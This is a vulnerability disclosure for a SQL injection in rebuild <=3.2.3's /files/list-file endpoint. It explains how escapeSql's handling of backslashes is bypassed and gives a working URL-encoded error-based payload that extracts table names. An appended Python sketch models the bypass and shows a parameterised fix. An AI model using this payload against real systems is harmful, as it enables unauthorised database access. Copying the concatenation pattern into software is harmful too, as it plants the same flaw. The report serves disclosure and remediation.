Version
<=3.2.3
What's the problem
There is a SQL injection vulnerability in the /files/list-file interface of the rebuild system.
How to reproduce this problem
Function points
Request message:
Payload:
%25%5c%27%20or%20updatexml(1,concat(0x7e,(select+table_name+from+information_schema.tables+where+table_schema=0x72656275696c64+limit+0,1),0x7e),1)+and%201%20=%20?%20--+
Vulnerability reproduction
System environment (OS/MySQL/Browser etc)
MySQL 5.7.26
Windows
JDK1.8.0_341
Chrome
Suggested description
SQL injection vulnerability exists in rebuild <=3.2.3.
Parameters are not properly validated, resulting in a SQL injection vulnerability.
Vulnerability Type
SQLi
Vendor of Product
https://github.com/getrebuild/rebuild
Affected Product Code Base
<=3.2.3
Affected Component
/files/list-file
Attack Type
Remote
Cause of vulnerability
In the com.rebuild.web.files.FileListController#listFile() method, the user's input is read and concatenated into SqlWhere.
StringEscapeUtils.escapeSql is used here to process the user input, and this method can be bypassed: it only doubles single quotes and leaves backslashes untouched, so under MySQL's default backslash escaping the input sequence \' becomes \'' after escaping, where \' is an escaped quote inside the literal and the remaining ' closes it.
SqlWhere is then inserted into the final query statement and executed.
When an attacker passes in a crafted SQL fragment, SQL injection is achieved.
The end, thanks!
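The following is an added example, not code from rebuild or from this report. It models commons-lang's escapeSql (which only doubles single quotes), scans the resulting MySQL string literal with MySQL's default backslash-escape rules to show exactly where the payload from this report breaks out, and contrasts it with a parameterised LIKE. The column name fileName, the shape of the WHERE clause and the function names are assumptions for illustration.

```python
"""Added example (not rebuild's code): why escapeSql is bypassable when its
output is spliced into a MySQL string literal, and the parameterised fix.
fileName, the WHERE shape and the function names are assumed for illustration."""
import urllib.parse

# Payload as posted in this report (URL-encoded; '+' and %20 are spaces).
PAYLOAD = (
    "%25%5c%27%20or%20updatexml(1,concat(0x7e,(select+table_name+from+"
    "information_schema.tables+where+table_schema=0x72656275696c64+limit+0,1),"
    "0x7e),1)+and%201%20=%20?%20--+"
)


def decode_payload(encoded: str) -> str:
    """URL-decode the way a servlet container would ('+' becomes a space)."""
    return urllib.parse.unquote_plus(encoded)


def escape_sql(value: str) -> str:
    """Model of StringEscapeUtils.escapeSql: doubles single quotes only.
    Backslashes, % and _ pass through untouched."""
    return value.replace("'", "''")


def build_where_vulnerable(user_input: str) -> str:
    """Assumed shape of the flawed SqlWhere: escaped value spliced into a LIKE literal."""
    return "fileName LIKE '%" + escape_sql(user_input) + "%'"


def literal_end(sql: str, opening_quote: int) -> int:
    """Index just past the MySQL single-quoted literal opened at sql[opening_quote].
    Default MySQL rules: backslash escapes the next character, '' is a literal quote.
    Returns -1 when the literal is never terminated."""
    i = opening_quote + 1
    while i < len(sql):
        ch = sql[i]
        if ch == "\\":
            i += 2  # \' or \\ stays inside the literal
            continue
        if ch == "'":
            if i + 1 < len(sql) and sql[i + 1] == "'":
                i += 2  # doubled quote, still inside the literal
                continue
            return i + 1  # this quote closes the literal
        i += 1
    return -1


def injected_sql(user_input: str) -> str:
    """Whatever lands outside the string literal is attacker-controlled SQL.
    Returns '' when everything stayed inside the literal."""
    where = build_where_vulnerable(user_input)
    start = where.index("'")
    end = literal_end(where, start)
    if end == -1:
        return ""
    return where[end:].strip()


def build_where_safe(user_input: str):
    """Hardened form: the value travels as a bind parameter, never as SQL text.
    Only the LIKE metacharacters need escaping (default MySQL escape char is \\)."""
    pattern = (
        user_input.replace("\\", "\\\\").replace("%", "\\%").replace("_", "\\_")
    )
    return "fileName LIKE ?", ["%" + pattern + "%"]


if __name__ == "__main__":
    decoded = decode_payload(PAYLOAD)
    print("decoded input :", decoded)
    print("after escapeSql:", build_where_vulnerable(decoded))
    print("escaped SQL    :", injected_sql(decoded) or "(none)")
    print("plain quote    :", injected_sql("a' or 1=1 -- ") or "(none)")
    print("parameterised  :", build_where_safe(decoded))
```

With the report's payload, injected_sql() returns the text beginning "or updatexml(", because the decoded prefix %\' becomes %\'' after escapeSql and the literal closes at the second quote. A plain quote without a backslash (a' or 1=1 -- ) yields nothing, which is why escapeSql looks adequate in casual testing. Note the caveat: with sql_mode NO_BACKSLASH_ESCAPES this specific payload would not break out, but relying on that is not a fix; binding the value as a parameter is.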